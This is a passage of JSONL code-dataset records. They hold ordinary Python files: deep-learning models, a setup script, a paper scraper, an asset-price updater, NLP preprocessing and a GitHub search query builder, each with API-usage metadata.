"line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.nn.MSELoss", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 60, "usage_type": "attribute"}, {"api_name": "visdom.Visdom", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.sin", "line_number": 83, "usage_type": "call"}]}
+{"seq_id": "218641798", "text": "from model import Tower\nfrom utils import model_property\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport utils as digits\nfrom tensorflow.contrib.slim.python.slim.nets import resnet_v1\nfrom tensorflow.python.ops import array_ops\n\n\nclass UserModel(Tower):\n @model_property\n def inference(self):\n x = tf.reshape(self.x, shape=[-1, self.input_shape[0], self.input_shape[1], self.input_shape[2]])\n with slim.arg_scope(resnet_v1.resnet_arg_scope()):\n logits, end_points = resnet_v1.resnet_v1_50(x, num_classes=self.nclasses, is_training=self.is_training\n # , spatial_squeeze=True\n , global_pool=True\n )\n # remove in the future if squeeze build in resnet_v1 function\n net = array_ops.squeeze(logits, [1,2], name='SpatialSqueeze')\n return net\n\n @model_property\n def loss(self):\n model = self.inference\n loss = digits.classification_loss(model, self.y)\n acc_top1 = digits.classification_accuracy_top_n(model, self.y, 1)\n acc_top5 = digits.classification_accuracy_top_n(model, self.y, 5)\n self.summaries.append(tf.summary.scalar(acc_top1.op.name, acc_top1))\n self.summaries.append(tf.summary.scalar(acc_top5.op.name, acc_top5))\n return loss\n", "sub_path": "digits/standard-networks/tensorflow/resnet50_top5.py", "file_name": "resnet50_top5.py", "file_ext": "py", "file_size_in_byte": 1304, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "model.Tower", "line_number": 10, "usage_type": "name"}, {"api_name": "tensorflow.reshape", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.contrib.slim.arg_scope", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.contrib.slim", "line_number": 14, "usage_type": "name"}, {"api_name": "tensorflow.contrib.slim.python.slim.nets.resnet_v1.resnet_arg_scope", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.contrib.slim.python.slim.nets.resnet_v1", "line_number": 14, "usage_type": "name"}, {"api_name": "tensorflow.contrib.slim.python.slim.nets.resnet_v1.resnet_v1_50", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.contrib.slim.python.slim.nets.resnet_v1", "line_number": 15, "usage_type": "name"}, {"api_name": "tensorflow.python.ops.array_ops.squeeze", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.python.ops.array_ops", "line_number": 20, "usage_type": "name"}, {"api_name": "utils.model_property", "line_number": 11, "usage_type": "name"}, {"api_name": "utils.classification_loss", "line_number": 26, "usage_type": "call"}, {"api_name": "utils.classification_accuracy_top_n", "line_number": 27, "usage_type": "call"}, {"api_name": "utils.classification_accuracy_top_n", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.summary.scalar", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 30, "usage_type": "attribute"}, {"api_name": "utils.model_property", "line_number": 23, "usage_type": "name"}]}
+{"seq_id": "88871342", "text": "import torch\nimport torch.nn as nn\nimport torchvision\n\nclass DenseBlock(nn.Module):\n def __init__(self, input_shape, outdim):\n super(DenseBlock, self).__init__()\n \n in_shape = input_shape\n self.outdim = outdim\n self.bn0 = nn.BatchNorm2d(in_shape)\n self.relu0 = nn.ReLU()\n \n self.conv1 = nn.Conv2d(in_shape, outdim, kernel_size=3, \n stride=1, padding=1) \n self.bn1 = nn.BatchNorm2d(outdim*2)\n self.relu1 = nn.ReLU()\n \n self.conv2 = nn.Conv2d(2*outdim, outdim, 3, 1, 1)\n self.relu2 = nn.ReLU()\n self.shortCNN = nn.Conv2d(in_shape, outdim, 3, 1, 1)\n #self.bn2 = nn.BatchNorm2d()\n \n def forward(self, x):\n pre_norm = self.relu0(self.bn0(x))\n conv1 = self.conv1(pre_norm)\n \n in_shape = x.shape[1]\n if in_shape != self.outdim:\n shortcut = self.shortCNN(x)\n else:\n shortcut = x\n \n result1 = torch.cat([conv1, shortcut], 1)\n \n bn1 = self.bn1(result1)\n relu1 = self.relu1(bn1)\n \n conv2 = self.conv2(relu1)\n result2 = torch.cat([conv2, result1, shortcut], 1)\n return self.relu2(result2)\n \nclass Dense_UNet(nn.Module):\n def __init__(self, in_shape):\n super(Dense_UNet, self).__init__()\n self.conv0 = nn.Conv2d(in_shape, 32, 3, 1, 1)\n self.bn0 = nn.BatchNorm2d(32)\n self.relu0 = nn.ReLU()\n \n self.Dense1 = DenseBlock(32, 32)#32*4\n self.max_pool1 = nn.MaxPool2d(3, stride=2, padding=1)\n \n self.Dense2 = DenseBlock(32*4, 64)#64*4\n self.max_pool2 = nn.MaxPool2d(3, stride=2, padding=1)\n \n self.Dense3 = DenseBlock(64*4, 64)#64*4\n self.max_pool3 = nn.MaxPool2d(3, stride=2, padding=1)\n \n self.Dense4 = DenseBlock(64*4, 64)\n \n self.up1 = nn.ConvTranspose2d(64*4, 64, 3, stride=2, padding=1,\n output_padding=1)#cat1, conv3\n \n self.Dense5 = DenseBlock(64*4+64, 64)\n self.up2 = nn.ConvTranspose2d(64*4, 64, 3, stride=2, padding=1,\n output_padding=1)#cat2, conv2\n \n self.Dense6 = DenseBlock(64*4+64, 64)\n self.up3 = nn.ConvTranspose2d(64*4, 32, 3, stride=2, padding=1,\n output_padding=1)#cat3, conv1\n \n self.Dense7 = DenseBlock(32*4+32, 32)\n self.conv8 = nn.Conv2d(32*4, 1, kernel_size=1)\n self.relu8 = nn.ReLU()\n \n def forward(self, x):\n conv0 = self.conv0(x)\n conv0 = self.bn0(conv0)\n conv0 = self.relu0(conv0)\n \n conv1 = self.Dense1(conv0)\n pool1 = self.max_pool1(conv1)\n \n conv2 = self.Dense2(pool1)\n pool2 = self.max_pool2(conv2)\n \n conv3 = self.Dense3(pool2)\n pool3 = self.max_pool3(conv3)\n \n conv4 = self.Dense4(pool3)\n \n up1 = self.up1(conv4)\n cat1 = torch.cat([up1, conv3], 1)\n \n conv5 = self.Dense5(cat1)\n up2 = self.up2(conv5)\n \n cat2 = torch.cat([up2, conv2], 1)\n conv6 = self.Dense6(cat2)\n \n up3 = self.up3(conv6)\n cat3 = torch.cat([up3, conv1], 1)\n \n conv7 = self.Dense7(cat3)\n conv8 = self.conv8(conv7)\n \n return conv8", "sub_path": "models/DUNet.py", "file_name": "DUNet.py", "file_ext": "py", "file_size_in_byte": 3424, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "torch.nn.Module", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 5, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 102, "usage_type": "call"}]}
+{"seq_id": "41682351", "text": "import io\nimport os.path\nfrom setuptools import find_packages, setup\n\nversion = '0.0.1-alpha'\n\ndef parse_requirements(filename):\n ''' load requirements from a pip requirements file'''\n lineiter = (line.strip() for line in open(filename))\n return [line for line in lineiter if line and not line.startswith('#')]\n\nwith io.open('README.md', 'rt', encoding='utf8') as f:\n readme = f.read()\n\nreqs = parse_requirements(os.path.join(os.path.dirname(__file__), 'requirements.txt'))\n\nsetup(\n name='strivial',\n version=version,\n author='Sean Watson',\n url='https://github.com/watsosc/strivial',\n license='Apache',\n description='Does some strava stuff',\n long_description=readme,\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n install_requires=reqs,\n extras_require={\n 'test': [\n 'pytest',\n 'coverage',\n ]\n }\n)", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 912, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "io.open", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 15, "usage_type": "name"}, {"api_name": "os.path.path.dirname", "line_number": 15, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 17, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "645416200", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 4 14:19:45 2018\r\n\r\n@author: Wei.l.c\r\n\"\"\"\r\n\r\nfrom getHtml import getHtml\r\nfrom getPaper import getPapers_geo,getPaper_geo\r\nfrom chkDir import chkData_geo\r\nfrom lxml import etree\r\nimport re\r\nimport pandas as pd\r\n\r\ncur_url='http://www.progeophys.cn/CN/1004-2903/current'\r\nmain_url='http://www.progeophys.cn/CN/1004-2903/home.shtml'\r\nbash_url='http://www.progeophys.cn/CN/volumn/volumn_'\r\nbashurl='.shtml'\r\ndown_url='http://www.progeophys.cn/CN/article/downloadArticleFile.do?attachType=PDF&id='\r\nsave_url=r'D:\\Paper\\中国地球物理学进展'\r\nsave_name='geo.csv'\r\n\r\ndef getPapers(url,spath,i,geo,total,fcreate=False):\r\n html=getHtml(url,0)\r\n \r\n burl=[]\r\n\r\n reg=''\r\n biaoti=re.findall(reg,html)\r\n reg=''+'(.*?)'+'
'\r\n zuozhe=re.findall(reg,html)\r\n \r\n html=etree.HTML(html)\r\n chuban=html.xpath('//div[@class=\"chuban\"]/span/text()')\r\n# biaoti=html.xpath('//li/div[@class=\"biaoti\"]/a/text()') #存在特殊字符情况\r\n# zuozhe=html.xpath('//li/div[@class=\"zuozhe\"]/text()') #存在空值情况\r\n jianjie=html.xpath('//li/div[@class=\"jianjie\"]/text()')\r\n downcount=html.xpath('//li/div/span/b/text()')\r\n \r\n tmp=chuban[1].split(' ')\r\n tmp=tmp[1] # 出版日期\r\n \r\n geo, fcreate=chkData_geo(geo, fcreate) \r\n geo, total=getPaper_geo(geo, spath+'\\\\'+save_name, spath, burl, biaoti, total, i, tmp, zuozhe, jianjie, downurl, downcount)\r\n \r\n return geo, fcreate, total\r\n \r\n \r\ndef getPapers_all(spath=save_url,spage=0,fcreate=False):\r\n papers=getPapers_geo(main_url)\r\n papers.sort()\r\n for i in papers:\r\n print(i)\r\n \r\n if fcreate:\r\n geo=[]\r\n total=0\r\n else:\r\n geo=pd.read_csv(spath+'\\\\'+save_name,encoding='gbk')\r\n total=geo.shape[0]\r\n\r\n# for i in range(233,234): #(1,150)\r\n for i in papers:\r\n if int(i) len(s):\n return 0\n c = Counter(s)\n for i, letter in enumerate(s):\n if c[letter] < k:\n leftLength = self.longestSubstring(s[:i], k)\n rightLength = self.longestSubstring(s[i+1:], k)\n return max(leftLength, rightLength)\n # break\n # else:\n return len(s)\n # return max(leftLength, rightLength)\n\n\n \"\"\" \n # solution 3 recursive \n res = 0 \n if not s or len(s) < k:\n return res \n for c in set(s):\n if s.count(c) < k:\n return max(self.longestSubstring(z, k) for z in s.split(c))\n # if every char in s appears >= k time, then the whole string is OK \n return len(s)\n \"\"\"\n ", "sub_path": "Medium/LC395.py", "file_name": "LC395.py", "file_ext": "py", "file_size_in_byte": 2180, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "collections.Counter", "line_number": 44, "usage_type": "call"}]}
+{"seq_id": "33872290", "text": "from mesa import Model\nfrom mesa.space import MultiGrid\nfrom mesa.time import RandomActivation\nfrom AntAgents import *\nfrom AphidAgents import *\nfrom uuid import uuid4\nimport numpy as np\nfrom mesa.datacollection import DataCollector\nfrom DataCollection import ant_state_collector\nimport json\n\n\nclass AntModel(Model):\n def __init__(self, num_ln, num_fj, num_mk_col, num_ft_col, width, height):\n \"\"\"\n :param num_ln: Number of L. Niger agents\n :param num_fj: Number of F. Japonica agents\n :param num_mk_col: Number of M. Kuricola colonies\n :param num_ft_col: Number of F. Tropicalis colonies\n :param width: Width of the model grid\n :param height: Height of the model grid\n \"\"\"\n super().__init__()\n self.num_ln = num_ln\n self.num_fj = num_fj\n self.num_mk_col = num_mk_col\n self.num_ft_col = num_ft_col\n self.grid = MultiGrid(width, height, True)\n self.schedule = RandomActivation(self)\n self.running = True\n\n for h in range(self.num_fj):\n ant = FJaponica(uuid4(), self)\n self.schedule.add(ant)\n self.grid.place_agent(ant, self.grid.find_empty())\n\n for j in range(self.num_mk_col):\n colony = MKuricolaColony(uuid4(), self)\n self.schedule.add(colony)\n self.grid.place_agent(colony, self.grid.find_empty())\n\n for k in range(self.num_ft_col):\n colony = FTropicalisColony(uuid4(), self)\n self.schedule.add(colony)\n self.grid.place_agent(colony, self.grid.find_empty())\n\n for i in range(self.num_ln):\n ant = LNiger(uuid4(), self)\n self.schedule.add(ant)\n self.grid.place_agent(ant, self.grid.find_empty())\n ant._init_post_place()\n\n self.data_collector = DataCollector(model_reporters={},\n agent_reporters={\"states\": ant_state_collector})\n self.weights_dict = json.load(open(\"newout.json\",\"r\"))\n\n def drop_pheromone(self, location):\n \"\"\"\n Drops a LNPheromone object at the given location if one does not already exist. If one does already exist,\n 1 is added to the existing object's 'tracks' field.\n :param location: An (x, y) tuple detailing the location to drop the pheromone.\n :return: None\n \"\"\"\n if not self.is_pheromone_in_cell(location):\n self.grid.place_agent(LNPheromone(uuid4(), self), location)\n else:\n self.get_pheromone_in_cell(location).tracks += 1\n\n def is_pheromone_in_cell(self, location):\n \"\"\"\n Determines if a pheromone already exists in a given cell.\n :param location: The location to check.\n :return: boolean\n \"\"\"\n return True in [type(x) == LNPheromone for x in self.grid.get_cell_list_contents(location)]\n\n def is_ant_in_cell(self, location):\n \"\"\"\n Determines whether an ant exists in a given cell.\n :param location: The location to check.\n :return: boolean\n \"\"\"\n return True in [isinstance(x, Ant) for x in self.grid.get_cell_list_contents(location)]\n\n def is_colony_in_cell(self, location):\n \"\"\"\n Determines whether an aphid colony exists in a given cell.\n :param location: The location to check.\n :return: boolean\n \"\"\"\n return True in [type(x) == MKuricolaColony or type(x) == FTropicalisColony\n for x in self.grid.get_cell_list_contents(location)]\n\n def get_pheromone_in_cell(self, location):\n \"\"\"\n Returns a LNPheromone object from a cell. ASsumes the cell has already been proven to have a pheromone object\n in it.\n :param location: The cell location to check.\n :return: The LNPheromone object within the cell.\n \"\"\"\n in_cell_pheromone = None\n for i in self.grid.get_cell_list_contents(location):\n if type(i) == LNPheromone:\n in_cell_pheromone = i\n return in_cell_pheromone\n\n def get_closest_agent_of_type(self, agent, agent_type):\n \"\"\"\n Gets the closest agent (besides self) of type agent_type. Returns -1 if it cannot find one.\n :param agent: The agent to find the closest agent_type to.\n :param agent_type: The type of the agent we are looking for.\n :return:\n \"\"\"\n for radius in range(1, self.grid.width):\n for neighbor in self.grid.get_neighbors(pos=agent.pos, moore=True, include_center=False, radius=radius):\n if isinstance(neighbor, agent_type):\n return neighbor\n return -1\n\n def get_closest_colony(self, agent):\n \"\"\"\n Gets the closest colony to an agent. If an agent is of type colony, it returns itself.\n :param agent: The agent to find the closest colony to.\n :return: The closest colony or -1 if not found.\n \"\"\"\n return self.get_closest_agent_of_type(agent, Colony)\n\n @staticmethod\n def distance_between_cells(location_a, location_b):\n \"\"\"\n Calculates the distance between two cells on the grid.\n :param location_a: First cell location.\n :param location_b: Second cell location.\n :return:\n \"\"\"\n return np.sqrt((location_a[0] - location_b[0])**2 + (location_a[1] - location_a[1])**2)\n\n def get_nearest_cell_to_goal(self, goal_cell, possible_cells):\n \"\"\"\n Returns the cell from a list of possible cells which is closest to the end location.\n :param goal_cell: The goal cell of the agent\n :param possible_cells: Candidate cells.\n :return: The location of the closest cell to the goal cell.\n \"\"\"\n closest_neighbor_index = -1\n closest_neighbor_distance = np.inf\n for i in range(0, len(possible_cells)):\n dist = self.distance_between_cells(possible_cells[i], goal_cell)\n if dist < closest_neighbor_distance:\n closest_neighbor_index = i\n closest_neighbor_distance = dist\n return possible_cells[closest_neighbor_index]\n\n def get_number_of_agents_in_radius(self, location, radius, agent_type):\n \"\"\"\n Returns the number of agents of type agent_type within a radius (not including center) of location.\n :param location: Location to search around.\n :param radius: Radius to search.\n :param agent_type: Type of agent to search for.\n :return: int\n \"\"\"\n total_agents = 0\n for neighbor in self.grid.get_neighbors(pos=location, moore=True, include_center=False, radius=radius):\n if isinstance(neighbor, agent_type):\n total_agents += 1\n return total_agents\n\n def get_all_of_agent_type(self, agent_type):\n \"\"\"\n Returns all instances of agents of type agent_type in the Grid.\n :param agent_type: The type of agent to find.\n :return: A list of agent objects.\n \"\"\"\n return [x for x in self.grid.get_neighbors(pos=(0,0), moore=True, include_center=True, radius=self.grid.width)\n if isinstance(x, agent_type)]\n\n def step(self):\n \"\"\"\n A method called every step that occurs\n :return: None\n \"\"\"\n self.data_collector.collect(self)\n self.schedule.step()\n", "sub_path": "AntModel.py", "file_name": "AntModel.py", "file_ext": "py", "file_size_in_byte": 7360, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "mesa.Model", "line_number": 13, "usage_type": "name"}, {"api_name": "mesa.space.MultiGrid", "line_number": 28, "usage_type": "call"}, {"api_name": "mesa.time.RandomActivation", "line_number": 29, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 33, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 38, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 43, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 48, "usage_type": "call"}, {"api_name": "mesa.datacollection.DataCollector", "line_number": 53, "usage_type": "call"}, {"api_name": "DataCollection.ant_state_collector", "line_number": 54, "usage_type": "name"}, {"api_name": "json.load", "line_number": 55, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 146, "usage_type": "attribute"}]}
+{"seq_id": "556645579", "text": "import asyncio\nfrom decimal import Decimal\nimport time\nimport os\nimport traceback\nfrom urllib import request\n\nimport asyncpg\nimport asyncio_redis\nimport simplejson as json\n\n\nclass AssetsUpdate():\n def __init__(self):\n self.redis = None\n self.db = None\n self.assets = dict()\n\n async def redis_connect(self):\n \"\"\"!Connecting to redis server\"\"\"\n if self.redis is None:\n redis_host = os.environ.get('REDIS_HOST', 'localhost')\n self.redis = await asyncio_redis.Connection.create(host=redis_host, port=6379, db=1)\n\n async def db_connect(self):\n \"\"\"!Connecting to database\"\"\"\n if self.db is None:\n self.db = await asyncpg.connect(user=os.environ['POSTGRES_DB_USER'],\n password=os.environ['POSTGRES_DB_PASS'],\n database=os.environ['POSTGRES_DB_NAME'],\n host=os.environ['POSTGRES_DB_HOST'],\n port=os.environ['POSTGRES_DB_PORT'])\n\n async def update_assets(self):\n \"\"\"!Updating assets from db\"\"\"\n res = await self.db.fetch('SELECT id, symbol FROM assets')\n self.assets = {x['symbol']: x['id'] for x in res}\n\n async def add_db_asset_history(self, asset_id, timestamp, value):\n \"\"\"!Adding asset history into database\n @param asset_id id of asset\n @param timestamp unixtime of when value received\n @param value decimal value of current asset\"\"\"\n await self.db.execute('''INSERT INTO asset_history (asset_id, timestamp, value) VALUES ($1, $2, $3)''',\n asset_id, timestamp, value)\n\n async def publish_update(self, asset_name, asset_id, timestamp, value):\n \"\"\"!Publishing record about asset into current asset redis channel\n @param asset_name symbol of asset\n @param asset_id id of asset\n @param timestamp unixtime of when value received\n @param value decimal value of current asset\"\"\"\n redis_prefix = os.environ.get('REDIS_PREFIX', '')\n data = json.dumps(dict(assetName=asset_name, time=timestamp, assetId=asset_id, value=value))\n await self.redis.publish('%sasset_data_%s' % (redis_prefix, asset_id), data)\n\n def get_assets_data(self):\n \"\"\"!Loading assed data from forex trading\n @return parsed data containing information about all assets\"\"\"\n data = request.urlopen('https://ratesjson.fxcm.com/DataDisplayer').read().strip()\n asset_data = json.loads(data.replace(b',}', b'}')[5:-2])\n return asset_data\n\n async def parse_data(self, asset_data, timestamp):\n \"\"\"Filtering assets data to take only reqired assets, calculating it and sending into assets channels\n @param asset_data parsed assets data received from forex trading\n @param timestamp unixtime of when assets data received\"\"\"\n for item in asset_data['Rates']:\n if item['Symbol'] in self.assets.keys():\n value = (Decimal(item['Bid']) + Decimal(item['Ask'])) / 2\n await self.publish_update(item['Symbol'], self.assets[item['Symbol']], timestamp, value)\n await self.add_db_asset_history(self.assets[item['Symbol']], timestamp, value)\n\n async def run(self):\n await self.redis_connect()\n await self.db_connect()\n timestamp = None\n while True:\n try:\n if int(time.time()) == timestamp:\n continue\n timestamp = int(time.time())\n await self.update_assets()\n asset_data = self.get_assets_data()\n await self.parse_data(asset_data, timestamp)\n await asyncio.sleep(0.1)\n except Exception:\n traceback.print_exc()\n\n\nif __name__ == '__main__':\n app = AssetsUpdate()\n loop = asyncio.get_event_loop()\n loop.run_until_complete(app.run())\n loop.close()\n", "sub_path": "testwsapp/asset_update_script.py", "file_name": "asset_update_script.py", "file_ext": "py", "file_size_in_byte": 4002, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "os.environ.get", "line_number": 22, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 22, "usage_type": "attribute"}, {"api_name": "asyncio_redis.Connection.create", "line_number": 23, "usage_type": "call"}, {"api_name": "asyncio_redis.Connection", "line_number": 23, "usage_type": "attribute"}, {"api_name": "asyncpg.connect", "line_number": 28, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 53, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 53, "usage_type": "attribute"}, {"api_name": "simplejson.dumps", "line_number": 54, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 60, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 60, "usage_type": "name"}, {"api_name": "simplejson.loads", "line_number": 61, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 70, "usage_type": "call"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "time.time", "line_number": 82, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 86, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 88, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 93, "usage_type": "call"}]}
+{"seq_id": "364254253", "text": "from __future__ import unicode_literals,print_function,division\nfrom io import open\nimport unicodedata\nimport string\nimport re\nimport random\nimport torch\ndevice=torch.device(\"cuda\"if torch.cuda.is_available() else 'cpu')\n# device=torch.device('cpu')\nSOS_token=0\nEOS_token=1\n\nclass Lang:\n def __init__(self,name):\n '''\n\n :param name: 语言的名字\n '''\n self.name=name\n self.word2index={}\n self.word2count={}\n self.index2word={0:\"SOS\",1:'EOS'}\n self.n_words=2 # count SOS and EOS\n\n def addSentence(self,sentence):\n for word in sentence.split(' '):\n self.addWord(word)\n\n def addWord(self,word):\n if word not in self.word2index:\n self.word2index[word]=self.n_words\n self.word2count[word]=1\n self.index2word[self.n_words]=word\n self.n_words+=1\n else:\n self.word2count[word]+=1\n\n# Turn a unicode string to plain ASCii\ndef unicodeToAscii(s):\n return ''.join(\n c for c in unicodedata.normalize('NFD',s)\n if unicodedata.category(c)!='Mn'\n )\n\n# 变小写,strip,移除非字母以及非.?!符号,同时对.?!进行替换为' .'或' ?'或' !'\ndef normalizeString(s):\n # strip([chars]):移除字符串头尾指定的字符序列(chars)\n s=unicodeToAscii(s.lower().strip())\n s = re.sub(r\"([.!?])\", r\" \\1\", s)\n s = re.sub(r\"[^a-zA-Z.!?]+\", r\" \", s)\n # [.!?]匹配里面的字符 \\1表示反向引用(从左往右数第一个左括号对应的内容)\n # [^m]匹配除m以外的字符 +表示一次或多次匹配\n # re.sub(pattern,repl,s) 根据给出的pattern在s中匹配并替换\n return s\n\n# s='I ... am test??##'\n# s = re.sub(r\"([.!?])\", r\" \\1\", s)\n# print(s) #I . . . am test ? ?##\n# s = re.sub(r\"[^a-zA-Z.!?]+\", r\" \", s)\n# print(s) #I . . . am test ? ?\n\n'''\n1.readlangs():\nread data file,split into lines,split lines into pairs,and make lang instance ,normalize\n2.filterPairs():\nfilter by length and content\n3.lang.add_sentence\nmake word lists from sentences in pairs\n'''\ndef readLangs(lang1,lang2,reverse=False):\n print(\"Reading lines...\")\n\n # read file and split into lines\n lines=open('../data/%s-%s.txt'%(lang1,lang2),encoding='utf-8').\\\n read().strip().split('\\n')\n\n # split every line into pairs and normalize\n pairs=[[normalizeString(s) for s in l.split('\\t')]for l in lines]\n\n # make lang instance\n if reverse:\n pairs=[list(reversed(p)) for p in pairs]\n input_lang=Lang(lang1)\n output_lang=Lang(lang2)\n else:\n input_lang=Lang(lang1)\n output_lang=Lang(lang2)\n return input_lang,output_lang,pairs\n\nMAX_LENGTH=10\neng_prefixes = (\n \"i am \", \"i m \",\n \"he is\", \"he s \",\n \"she is\", \"she s \",\n \"you are\", \"you re \",\n \"we are\", \"we re \",\n \"they are\", \"they re \"\n)\n\ndef filterPair(p):\n return len(p[0].split(' ')) str:\n time_lower, time_higher = time\n language_query = \"\" if self.selected_language is None else (\"+language:\" + self.selected_language)\n\n query_build_str = ['q=created:\\\"%s+..+%s\\\"%s' % (time_lower, time_higher, language_query)]\n query_build_str.append('per_page=100')\n\n # If sort type is default then we should query with updated\n # as 'default' is CUSTOM type not supported by Octopus API\n query_build_str.append('sort=%s' % ('updated' if self.sort_type == 'default' else self.sort_type))\n\n return '?' + '&'.join(query_build_str)\n\n def get_sanitized_data(self) -> str:\n if self._output_text is not None:\n return self._output_text\n elif self._repository_list is None:\n return \"\"\n else:\n # previously geathered repository\n repositories = self._repository_list\n\n output_text_buffer = list()\n output_text_buffer.append(\"Total entries found: %s\" % len(repositories))\n output_text_buffer.append(\"----------------------------------------\")\n if self.extended_output:\n output_text_buffer.append('\\n'.join(\"#%s\\t\\t\\t%s\\t\\t\\t\\t\\t\\t%s\" %\n (idx, i['full_name'], 